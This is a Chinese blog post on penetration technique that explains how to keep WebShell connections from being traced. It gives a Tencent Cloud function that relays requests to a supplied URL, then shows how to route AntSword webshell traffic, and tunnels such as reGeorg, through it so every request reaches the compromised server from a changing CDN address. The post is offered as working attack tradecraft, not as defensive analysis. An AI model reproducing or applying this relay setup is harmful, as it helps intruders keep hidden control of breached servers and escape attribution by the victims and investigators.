论如何防溯源连接 WebShell 作者: admin 时间: 2021-02-27 分类: 随便写写,渗透技巧 新年新气象 :) # 原理介绍 这个技术的核心原理是利用腾讯云的云函数将我们的请求进行转发(和一些使用第三方应用进行转发是一样的)。在国外应该早就玩烂了。 # 更新日志 2020.03.01 - 更新云函数代码 # 具体步骤 ## 创建函数 使用默认模板即可,然后选择下一步 data:image/s3,"s3://crabby-images/40dfd/40dfd432996b3354925cfcf4c5343a126294cbaf" alt="" 到这里也可以全部默认,函数名称和地域可以自己自由发挥,然后点击完成。 data:image/s3,"s3://crabby-images/75490/75490cca0d8442eb194c3ed3d1b6d2aa345a10af" alt="" 然后依次打开函数管理 - 函数代码 data:image/s3,"s3://crabby-images/8370a/8370ab3612cdc622654d96750156dc40e437325b" alt="" 然后把下面代码替换 index.py 的代码,点击部署 ```python=1 # -*- coding: utf8 -*- import requests import json def geturl(urlstr): jurlstr = json.dumps(urlstr) dict_url = json.loads(jurlstr) return dict_url['u'] def main_handler(event, context): url = geturl(event['queryString']) headers = event['headers'] del headers['host'] if event['httpMethod'] == 'GET' : resp = requests.get(url,headers=headers,verify=False) else: postdata = event['body'] resp = requests.post(url,data=postdata,headers=headers,verify=False) response = { "isBase64Encoded": False, "statusCode": 200, "headers": {'Content-Type': 'text/html;charset=' + resp.apparent_encoding}, "body": resp.text } return response ``` 点击触发管理,就会看到访问路径,复制备用 data:image/s3,"s3://crabby-images/e2b74/e2b74f3a88c14a3f442d0518b8b6a02ad132ca5c" alt="" ## 开始 Webshell 请求来源隐藏 打开蚁剑,url一栏中填入 `访问路径 + webshell地址`,列如 ``` https://service-gcuy2k9u-1257053841.gz.apigw.tencentcs.com/release/APIGWHtmlDemo-1614356287?u=https://www.xxx.com/shell.php ``` 其他设置和正常使用配置即可,看看效果 data:image/s3,"s3://crabby-images/cf60c/cf60ce66a1e8b5db064122c1bf62277dc2dbb7cc" alt="" 所有请求都是利用腾讯云的云函数将我们的请求进行转发,云函数的服务器是自带 CDN 的,所以我们每次去请求的 Webshell IP 都是不同的,这就达到了 Webshell 请求来源隐藏。 # 注意 1. 在函数管理 - 函数配置里面,最好把执行超时时间设置成和蚁剑里面的超时时间一样或者更长 data:image/s3,"s3://crabby-images/20f52/20f5235836629e25320bbd762ab939789e3e102c" alt="" 2. 任何 Webshell 管理工具或者代理工具如 reGeorg 都可使用该方法来进行请求来源隐藏 标签: 对抗